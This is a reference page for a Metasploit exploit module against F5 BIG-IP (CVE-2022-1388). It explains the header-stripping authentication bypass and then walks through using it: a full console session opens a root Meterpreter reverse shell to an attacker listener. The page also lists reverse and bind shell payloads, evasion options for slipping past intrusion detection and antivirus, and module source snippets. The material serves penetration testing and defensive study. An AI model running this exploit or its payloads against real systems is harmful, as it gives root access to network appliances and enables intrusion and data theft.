F5 BIG-IP iControl RCE via REST Authentication Bypass - Metasploit


This page contains detailed information about how to use the exploit/linux/http/f5_icontrol_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: F5 BIG-IP iControl RCE via REST Authentication Bypass
Module: exploit/linux/http/f5_icontrol_rce
Source code: modules/exploits/linux/http/f5_icontrol_rce.rb
Disclosure date: 2022-05-04
Last modification time: 2022-05-11 16:36:23 +0000
Supported architecture(s): cmd, x86, x64
Supported platform(s): Linux, Unix
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2022-1388

This module exploits an authentication bypass vulnerability in the F5 BIG-IP iControl REST service to gain access to the admin account, which is capable of executing commands through the /mgmt/tm/util/bash endpoint. Successful exploitation results in remote code execution as the root user.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
  • artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.

Basic Usage


msf > use exploit/linux/http/f5_icontrol_rce
msf exploit(f5_icontrol_rce) > exploit

Required Options


  • RHOSTS: The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit

Knowledge Base


Vulnerable Application


Description

This module exploits an authentication bypass vulnerability (CVE-2022-1388) in the F5 BIG-IP iControl REST service to gain access to the admin account, which is capable of executing commands through the /mgmt/tm/util/bash endpoint. Successful exploitation results in remote code execution as the root user.

The F5 BIG-IP management interface is made up of two different web servers: a reverse proxy that validates HTTP Basic authorization using mod_auth_pam.so, and a back end that validates the X-F5-Auth-Token header using AuthTokenWorker.java. If the reverse proxy sees an X-F5-Auth-Token header, it sends the full request to the back end for validation; if the back end sees a request without an X-F5-Auth-Token header, it assumes it has already been validated by the reverse proxy and uses the username from the Authorization header without validating the password a second time.

The issue fixed in CVE-2022-1388 is that the Connection header, processed by the reverse proxy, can remove the X-F5-Auth-Token header after the reverse proxy sees the request, but before it's forwarded to the back end. That means that the reverse proxy will think the back end is handling the authorization (since it saw the appropriate header), but the back end thinks the reverse proxy handled it (because the header gets removed) and permits the request. This is contrary to the expected operation and means that whatever username was passed in the Authorization field will be trusted as if the front end had validated it. This will result in the attacker bypassing authorization checks and gaining access to admin.

The iControl REST service has several ways to execute shell commands as an administrative user, but mgmt/tm/util/bash is purpose-built to execute bash commands which makes it a perfect target.

CVE-2022-1388 affects the following F5 BIG-IP versions:

  • 16.1.x versions prior to 16.1.2.2
  • 15.1.x versions prior to 15.1.5.1
  • 14.1.x versions prior to 14.1.4.6
  • 13.1.x versions prior to 13.1.5
  • all 12.1.x and 11.6.x

Tested against BIG-IP 12.1.5.3, 13.1.3.6, 13.1.4.1, and 16.1.2.1.

Setup

Import a vulnerable BIG-IP or BIG-IQ OVA, such as BIGIP-16.0.1-0.0.3.ALL-vmware.ova from https://ipxpy.net/f5/f5-1-course-introduction/, into your desired hypervisor. Boot the virtual appliance, and it should be exploitable out of the box once it's up.

Verification Steps


Follow Setup and Scenarios.

Targets


0

This executes a Unix command.

1

This uses a Linux dropper to execute code.

Options


USERNAME

Set this to a valid admin username. Defaults to admin.

TARGETURI

Set this to base path to the iControl installation. Defaults to /.

Scenarios


BIG-IP 16.1.2.1

msf6 > use exploits/linux/http/f5_icontrol_rce
[*] Using configured payload cmd/unix/reverse_python_ssl
msf6 exploit(linux/http/f5_icontrol_rce) > set PAYLOAD payload/cmd/unix/python/meterpreter/reverse_tcp
PAYLOAD => cmd/unix/python/meterpreter/reverse_tcp
msf6 exploit(linux/http/f5_icontrol_rce) > set RHOSTS 10.0.0.133
RHOSTS => 10.0.0.133
msf6 exploit(linux/http/f5_icontrol_rce) > set LHOST 10.0.0.123
LHOST => 10.0.0.123
msf6 exploit(linux/http/f5_icontrol_rce) > set RPORT 443
RPORT => 443
msf6 exploit(linux/http/f5_icontrol_rce) > show options

Module options (exploit/linux/http/f5_icontrol_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   yes       iControl password
   HttpUsername  admin            yes       iControl username
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS        10.0.0.133       yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT         443              yes       The target port (TCP)
   SSL           true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI     /                yes       The base path to the iControl installation
   VHOST                          no        HTTP server virtual host


Payload options (cmd/unix/python/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.0.0.123       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Unix Command


msf6 exploit(linux/http/f5_icontrol_rce) > exploit

[*] Started reverse TCP handler on 10.0.0.123:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Checking 10.0.0.133:443
[+] The target is vulnerable.
[*] Executing Unix Command for cmd/unix/python/meterpreter/reverse_tcp
[*] Sending stage (40132 bytes) to 10.0.0.133
[*] Meterpreter session 1 opened (10.0.0.123:4444 -> 10.0.0.133:50372) at 2022-05-11 10:59:32 -0700
[!] Command execution timed out

meterpreter > getuid
Server username: root

Go back to menu.

Msfconsole Usage


Here is how the linux/http/f5_icontrol_rce exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/f5_icontrol_rce

[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/http/f5_icontrol_rce) > show info

       Name: F5 BIG-IP iControl RCE via REST Authentication Bypass
     Module: exploit/linux/http/f5_icontrol_rce
   Platform: Unix, Linux
       Arch: cmd, x86, x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2022-05-04

Provided by:
  Heyder Andrade
  alt3kx <[email protected]>
  James Horseman
  Ron Bowes

Module side effects:
 ioc-in-logs
 artifacts-on-disk

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Unix Command
  1   Linux Dropper

Check supported:
  Yes

Basic options:
  Name          Current Setting  Required  Description
  ----          ---------------  --------  -----------
  HttpPassword                   yes       iControl password
  HttpUsername  admin            yes       iControl username
  Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                         yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
  RPORT         443              yes       The target port (TCP)
  SSL           true             no        Negotiate SSL/TLS for outgoing connections
  SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
  TARGETURI     /                yes       The base path to the iControl installation
  URIPATH                        no        The URI to use for this exploit (default is random)
  VHOST                          no        HTTP server virtual host

Payload information:

Description:
  This module exploits an authentication bypass vulnerability in the 
  F5 BIG-IP iControl REST service to gain access to the admin account, 
  which is capable of executing commands through the 
  /mgmt/tm/util/bash endpoint. Successful exploitation results in 
  remote code execution as the root user.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2022-1388
  https://support.f5.com/csp/article/K23605346
  https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/
  https://github.com/alt3kx/CVE-2022-1388_PoC

Module Options


This is a complete list of options available in the linux/http/f5_icontrol_rce exploit:

msf6 exploit(linux/http/f5_icontrol_rce) > show options

Module options (exploit/linux/http/f5_icontrol_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword                   yes       iControl password
   HttpUsername  admin            yes       iControl username
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT         443              yes       The target port (TCP)
   SSL           true             no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI     /                yes       The base path to the iControl installation
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST                          no        HTTP server virtual host

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper

Advanced Options


Here is a complete list of advanced options supported by the linux/http/f5_icontrol_rce exploit:

msf6 exploit(linux/http/f5_icontrol_rce) > show advanced

Module advanced options (exploit/linux/http/f5_icontrol_rce):

   Name                     Current Setting                          Required  Description
   ----                     ---------------                          --------  -----------
   AutoCheck                true                                     no        Run check before exploit
   CMDSTAGER::DECODER                                                no        The decoder stub to use.
   CMDSTAGER::FLAVOR        bourne                                   no        The CMD Stager to use. (Accepted: auto, bourne, debug_asm, debug_write,
                                                                               echo, printf, vbs, vbs_adodb, certutil, tftp, wget, curl, fetch, lwprequ
                                                                               est, psh_invokewebrequest)
   CMDSTAGER::SSL           false                                    no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                                                   no        Writable directory for staged files
   CmdExecTimeout           3.5                                      yes       Command execution timeout
   ContextInformationFile                                            no        The information file that contains context information
   DOMAIN                   WORKSTATION                              yes       The domain to use for Windows authentication
   DigestAuthIIS            true                                     no        Conform to IIS, should work for most servers. Only set to false for non-
                                                                               IIS servers
   DisablePayloadHandler    false                                    no        Disable the handler code for the selected payload
   EXE::Custom                                                       no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR               false                                    no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack            false                                    no        Use the default template in case the specified one is missing
   EXE::Inject              false                                    no        Set to preserve the original EXE function
   EXE::OldMethod           false                                    no        Set to use the substitution EXE generation method.
   EXE::Path                                                         no        The directory in which to look for the executable template
   EXE::Template                                                     no        The executable template file name.
   EnableContextEncoding    false                                    no        Use transient context when encoding payloads
   FingerprintCheck         true                                     no        Conduct a pre-exploit fingerprint verification
   ForceExploit             false                                    no        Override check result
   HttpClientTimeout                                                 no        HTTP connection and receive timeout
   HttpRawHeaders                                                    no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace                false                                    no        Show the raw HTTP requests and responses
   HttpTraceColors          red/blu                                  no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly     false                                    no        Show HTTP headers only in HttpTrace
   ListenerBindAddress                                               no        The specific IP address to bind to if different from SRVHOST
   ListenerBindPort                                                  no        The port to bind to if different from SRVPORT
   ListenerComm                                                      no        The specific communication channel to use for this service
   MSI::Custom                                                       no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR               false                                    no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                         no        The directory in which to look for the msi template
   MSI::Template                                                     no        The msi template file name
   MSI::UAC                 false                                    no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLCipher                                                         no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression           false                                    no        Enable SSL/TLS-level compression
   SSLServerNameIndication                                           no        SSL/TLS Server Name Indication (SNI)
   SSLVersion               Auto                                     yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-
                                                                               negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots               false                                    no        Return a robots.txt file if asked for one
   URIHOST                                                           no        Host to use in URI (useful for tunnels)
   URIPORT                                                           no        Port to use in URI (useful for tunnels)
   UserAgent                Mozilla/5.0 (Windows NT 10.0; Win64; x6  no        The User-Agent header to use for all requests
                            4; rv:97.0) Gecko/20100101 Firefox/97.0
   VERBOSE                  false                                    no        Enable detailed status messages
   WORKSPACE                                                         no        Specify the workspace for this module
   WfsDelay                 2                                        no        Additional delay in seconds to wait for a session

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugBuild        false            no        Use a debug version of Meterpreter
   MeterpreterDebugLogging                       no        The Meterpreter debug logging configuration, see https://github.com/rapid7/metasploit-framew
                                                           ork/wiki/Meterpreter-Debugging-Meterpreter-Sessions
   MeterpreterTryToFork         true             no        Fork a new process if the functionality is available
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  true             no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but di
                                                           rectly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/f5_icontrol_rce module can exploit:

msf6 exploit(linux/http/f5_icontrol_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Unix Command
   1   Linux Dropper

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/f5_icontrol_rce exploit:

msf6 exploit(linux/http/f5_icontrol_rce) > show payloads

Compatible Payloads
===================

   #   Name                                              Disclosure Date  Rank    Check  Description
   -   ----                                              ---------------  ----    -----  -----------
   0   payload/generic/custom                                             normal  No     Custom Payload
   1   payload/generic/debug_trap                                         normal  No     Generic x86 Debug Trap
   2   payload/generic/shell_bind_tcp                                     normal  No     Generic Command Shell, Bind TCP Inline
   3   payload/generic/shell_reverse_tcp                                  normal  No     Generic Command Shell, Reverse TCP Inline
   4   payload/generic/ssh/interact                                       normal  No     Interact with Established SSH Connection
   5   payload/generic/tight_loop                                         normal  No     Generic x86 Tight Loop
   6   payload/linux/x64/exec                                             normal  No     Linux Execute Command
   7   payload/linux/x64/meterpreter/bind_tcp                             normal  No     Linux Mettle x64, Bind TCP Stager
   8   payload/linux/x64/meterpreter/reverse_tcp                          normal  No     Linux Mettle x64, Reverse TCP Stager
   9   payload/linux/x64/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   10  payload/linux/x64/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   11  payload/linux/x64/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   12  payload/linux/x64/pingback_bind_tcp                                normal  No     Linux x64 Pingback, Bind TCP Inline
   13  payload/linux/x64/pingback_reverse_tcp                             normal  No     Linux x64 Pingback, Reverse TCP Inline
   14  payload/linux/x64/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager
   15  payload/linux/x64/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   16  payload/linux/x64/shell_bind_ipv6_tcp                              normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   17  payload/linux/x64/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   18  payload/linux/x64/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   19  payload/linux/x64/shell_reverse_ipv6_tcp                           normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   20  payload/linux/x64/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   21  payload/linux/x86/adduser                                          normal  No     Linux Add User
   22  payload/linux/x86/chmod                                            normal  No     Linux Chmod
   23  payload/linux/x86/exec                                             normal  No     Linux Execute Command
   24  payload/linux/x86/meterpreter/bind_ipv6_tcp                        normal  No     Linux Mettle x86, Bind IPv6 TCP Stager (Linux x86)
   25  payload/linux/x86/meterpreter/bind_ipv6_tcp_uuid                   normal  No     Linux Mettle x86, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   26  payload/linux/x86/meterpreter/bind_nonx_tcp                        normal  No     Linux Mettle x86, Bind TCP Stager
   27  payload/linux/x86/meterpreter/bind_tcp                             normal  No     Linux Mettle x86, Bind TCP Stager (Linux x86)
   28  payload/linux/x86/meterpreter/bind_tcp_uuid                        normal  No     Linux Mettle x86, Bind TCP Stager with UUID Support (Linux x86)
   29  payload/linux/x86/meterpreter/reverse_ipv6_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager (IPv6)
   30  payload/linux/x86/meterpreter/reverse_nonx_tcp                     normal  No     Linux Mettle x86, Reverse TCP Stager
   31  payload/linux/x86/meterpreter/reverse_tcp                          normal  No     Linux Mettle x86, Reverse TCP Stager
   32  payload/linux/x86/meterpreter/reverse_tcp_uuid                     normal  No     Linux Mettle x86, Reverse TCP Stager
   33  payload/linux/x86/meterpreter_reverse_http                         normal  No     Linux Meterpreter, Reverse HTTP Inline
   34  payload/linux/x86/meterpreter_reverse_https                        normal  No     Linux Meterpreter, Reverse HTTPS Inline
   35  payload/linux/x86/meterpreter_reverse_tcp                          normal  No     Linux Meterpreter, Reverse TCP Inline
   36  payload/linux/x86/metsvc_bind_tcp                                  normal  No     Linux Meterpreter Service, Bind TCP
   37  payload/linux/x86/metsvc_reverse_tcp                               normal  No     Linux Meterpreter Service, Reverse TCP Inline
   38  payload/linux/x86/read_file                                        normal  No     Linux Read File
   39  payload/linux/x86/shell/bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind IPv6 TCP Stager (Linux x86)
   40  payload/linux/x86/shell/bind_ipv6_tcp_uuid                         normal  No     Linux Command Shell, Bind IPv6 TCP Stager with UUID Support (Linux x86)
   41  payload/linux/x86/shell/bind_nonx_tcp                              normal  No     Linux Command Shell, Bind TCP Stager
   42  payload/linux/x86/shell/bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Stager (Linux x86)
   43  payload/linux/x86/shell/bind_tcp_uuid                              normal  No     Linux Command Shell, Bind TCP Stager with UUID Support (Linux x86)
   44  payload/linux/x86/shell/reverse_ipv6_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager (IPv6)
   45  payload/linux/x86/shell/reverse_nonx_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
   46  payload/linux/x86/shell/reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Stager
   47  payload/linux/x86/shell/reverse_tcp_uuid                           normal  No     Linux Command Shell, Reverse TCP Stager
   48  payload/linux/x86/shell_bind_ipv6_tcp                              normal  No     Linux Command Shell, Bind TCP Inline (IPv6)
   49  payload/linux/x86/shell_bind_tcp                                   normal  No     Linux Command Shell, Bind TCP Inline
   50  payload/linux/x86/shell_bind_tcp_random_port                       normal  No     Linux Command Shell, Bind TCP Random Port Inline
   51  payload/linux/x86/shell_reverse_tcp                                normal  No     Linux Command Shell, Reverse TCP Inline
   52  payload/linux/x86/shell_reverse_tcp_ipv6                           normal  No     Linux Command Shell, Reverse TCP Inline (IPv6)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/f5_icontrol_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/f5_icontrol_rce) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::chunked                 false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression             none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::junk_headers            false            no        Enable insertion of random junk HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::no_cache                false            no        Disallow the browser to cache HTTP content
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::server_name             Apache           yes       Configures the Server header of all outgoing replies
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-norm
                                                            al, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request
   TCP::max_send_size            0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay               0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

:resterrorresponse


Here is a relevant code snippet related to the ":resterrorresponse" error message:

105:	
106:	    return CheckCode::Unknown unless res&.code == 401
107:	
108:	    body = res.get_json_document
109:	
110:	    return CheckCode::Safe unless body.key?('message') && body['kind'] == ':resterrorresponse'
111:	
112:	    signature = Rex::Text.rand_text_alpha(13)
113:	    stub = "echo #{signature}"
114:	    res = send_command(stub)
115:	    return CheckCode::Safe unless res&.code == 200

tm:util:bash:runstate


Here is a relevant code snippet related to the "tm:util:bash:runstate" error message:

114:	    res = send_command(stub)
115:	    return CheckCode::Safe unless res&.code == 200
116:	
117:	    body = res.get_json_document
118:	
119:	    return CheckCode::Safe unless body['kind'] == 'tm:util:bash:runstate'
120:	
121:	    return CheckCode::Vulnerable if body['commandResult'].chomp == signature
122:	
123:	    CheckCode::Safe
124:	  end

commandResult


Here is a relevant code snippet related to the "commandResult" error message:

116:	
117:	    body = res.get_json_document
118:	
119:	    return CheckCode::Safe unless body['kind'] == 'tm:util:bash:runstate'
120:	
121:	    return CheckCode::Vulnerable if body['commandResult'].chomp == signature
122:	
123:	    CheckCode::Safe
124:	  end
125:	
126:	  def exploit

Command execution timed out


Here is a relevant code snippet related to the "Command execution timed out" error message:

137:	  def execute_command(cmd, _opts = {})
138:	    vprint_status("Executing command: #{cmd}")
139:	
140:	    res = send_command(cmd)
141:	    unless res
142:	      print_warning('Command execution timed out')
143:	      return
144:	    end
145:	
146:	    json = res.get_json_document
147:	

Failed to execute command


Here is a relevant code snippet related to the "Failed to execute command" error message:

144:	    end
145:	
146:	    json = res.get_json_document
147:	
148:	    unless res.code == 200 && json['kind'] == 'tm:util:bash:runstate'
149:	      fail_with(Failure::PayloadFailed, 'Failed to execute command')
150:	    end
151:	
152:	    print_good('Successfully executed command')
153:	
154:	    return unless (cmd_result = json['commandResult'])

Go back to menu.


GITHUB_OAUTH_TOKEN environment variable not set. See how

References


See Also


Check also the following modules related to this module:

Authors


  • Heyder Andrade
  • alt3kx <alt3kx[at]protonmail.com>
  • James Horseman
  • Ron Bowes

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.